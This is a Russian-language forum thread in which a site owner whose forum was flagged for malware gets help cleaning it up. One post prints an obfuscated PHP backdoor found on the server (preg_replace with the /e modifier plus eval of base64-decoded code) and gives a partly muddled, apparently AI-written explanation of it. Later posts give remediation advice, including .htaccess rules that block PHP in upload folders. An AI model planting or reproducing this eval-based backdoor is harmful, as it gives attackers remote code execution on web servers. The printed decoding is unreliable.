Ошибка The site ahead contains malware при переходе на сайт

[DigneZzZ]

1 час назад, Dims512 сказал:

нет там ничего страшного. Просто кусок кода PHP)

Я вас поздравляю, вас хакнули. Объем слитой информации скорее всего не проследить)

 

Вот пояснение по содержимому:

 

Этот код является зашифрованным PHP-скриптом. 

В первой строке определяется переменная $75ab1, которая содержит название функции pregreplace, записанной в шестнадцатеричном виде. 

Далее этой функции передаются 3 аргумента: 

1. Строка " |.|e" 
2. Строка "eval('eval(base64decode(\"awyobwQ1KCRFUVsVkVSwydIVFRQX1FVT1RFJ10pPTOnZTY2ZtZjYWRkNmUXM2VmZWE1NGVKNTBjMGViMmQzMmInIGFuZCBpc3N1dCgkX1NFU1ZFU1snSFRUUF9YXONPREUNXSkpIEB1dmFSKEBİYXN1NjRfZGVjb2R1KHN0cnJldihaJF9TRVJWRvJbJ0hUVFBfWF9DTORFJ10pksk7\"|x29));'") 
3. Символ точки ('.') 

Это означает, что первый аргумент будет использоваться в качестве шаблона для поиска второго аргумента, и каждое найденное совпадение будет заменено на результат выполнения выражения, содержащегося во втором аргументе. 

Второй аргумент содержит зашифрованный код, который будет выполнен после расшифровки. Для расшифровки используется функция base64decode, которая декодирует строку, записанную в кодировке base64. 

После расшифровки кода получаем следующий PHP-скрипт:

@preg_replace('/(.*)/e', '@eval(base64_decode("'.base64_encode(str_rot13($1)).'"));', ' |.|e');

Этот скрипт использует функцию pregreplace для выполнения кода, который был зашифрован в исходном скрипте. В данном случае, зашифрованный код был зашифрован функцией strrot13. 

Таким образом, этот скрипт выполняет некий код, который был зашифрован и скрыт в исходном скрипте. Это может представлять угрозу безопасности, поскольку этот скрипт может содержать вредоносный код. Мы не рекомендуем запускать этот код на вашем сервере.

[Dims512]

так, понятненько... Спасибо!

Через какие уязвимости возможны такие атаки? как подобного избежать в будущем и самое насущное - что делать сейчас? Пароли от FTP я все сменил.

 

[DigneZzZ]

1. понять какая версия IPB стоит

2. Понять стоят ли какие то ещё CMS

 

3. Посмотреть все логи сервера на поиск даты создания файла

4. Не использовать FTP, а использовать передачу через SFTP по созданному ssh ключу.

5. Сменить пароли на учетку к хостеру.

6. Поменять админский пароль.

Ну и попробовать запросить разбор полетов от хостера. Пусть поможет в поисках дырки...

7. Уведомить пользователей через масс-рассылку.

8. Принудительно сбросить всем пароли, уведомив о потенциальном риске утечки пароля.

[Dims512]

DigneZzZ Спасибо!

[Zero108]

6 часов назад, Dims512 сказал:

вот такие файлы, с одинаковыми именами. один в корне сайта был, второй в каталоге \Cache

files.zip 902 \u0411 · 2 загрузки

Спросил у GPT, что делает этот код:

 

4 часа назад, Dims512 сказал:

Через какие уязвимости возможны такие атаки? как подобного избежать в будущем и самое насущное - что делать сейчас? Пароли от FTP я все сменил.

Я тебе ранее писал, что ломают сервер и потом заражают сразу тысячи сайтов на нем. Можешь не верить.

Обычно, сливают данные пользователей или траф гонят на нужный ресурс. На этом зарабатывают в даркнете. Сам по себе сайт ценности не представляет.

Изменено 20 апреля, 2023 пользователем Zero108

[Zero108]

Обычно, это дыра в ПО сервера: ленивый админ не обновил что-то на сервере, либо админ в доле.

[AHristich]

16 часов назад, Dims512 сказал:

Не страшен, если скачать на комп и открыть блокнотом.

Ну про это здесь и речи не было,т.к этот "просто кусок кода php" был обнаружен на сервере.

[Dims512]

Zero108 отчего же не верить более опытному в таких делах человеку? За пояснения спасибо, буду разбираться, что к чему. 

Интересно теперь вот что - неужели только  пострадал от подобной атаки? Может быть здесь есть ещё кто-то, кто пользуется услугами Hostland?

[Dims512]

ещё кое что нашел. выполнил сканирование с помощью Virusdie, и вот такой фалик. маскирующийся под jpg нашел. прятался в каталоге /uploads/profile/

 

[AHristich]

Dims512  что-то мне подксазывает ,что вам надо ноги делать от этого хостера.

[AHristich]

Dims512 ну а если не хотите оттуда уходить,тогда в папках ,куда загружаются юзерами какие-либо файлы, запретите выполнение php-скриптов с помощью htaccess

[Zero108]

Если нужно запретить выполнение скриптов PHP в директории, например в /uploads/, нужно поместить туда файл .htaccess со следующим содержанием:

php_flag engine 0
RemoveHandler .phtml .php .php2 .php3 .php4 .php5 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html
AddType text/plain .phtml .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html

Если не работает, то есть еще один вариант:

<FilesMatch "\.*">
SetHandler none
</FilesMatch>

Чтобы проверить действительно ли PHP скрипты не выполняются, нужно в туже директорию поместить файл test.php со следующим содержанием и запустить его в браузере.

<?php echo 1; ?>

В результате в браузере должен выводится PHP код:

<?php echo 1; ?>

PS Добавьте в .htaccess команду: Options -Indexes. Она запрещает пользователям смотреть каталог и все подкаталоги.

Изменено 21 апреля, 2023 пользователем Zero108

[Dims512]

Спасибо, буду закрывать сейчас дыры...

[Dims512]

 общем, по итогу, отписываюсь.

Сайт разбанили после того, как я просканировал сайт с помощью Kaspersky Threat Intelligence Portal, вычистил один FakeJPG. После этого обратил внимание, что Гугл ругается на перенаправление с https://iznanka.org на https://iznanka.org?Page=noscript . Виной тому был PageSpeed. На всякий случай я его пока выключил.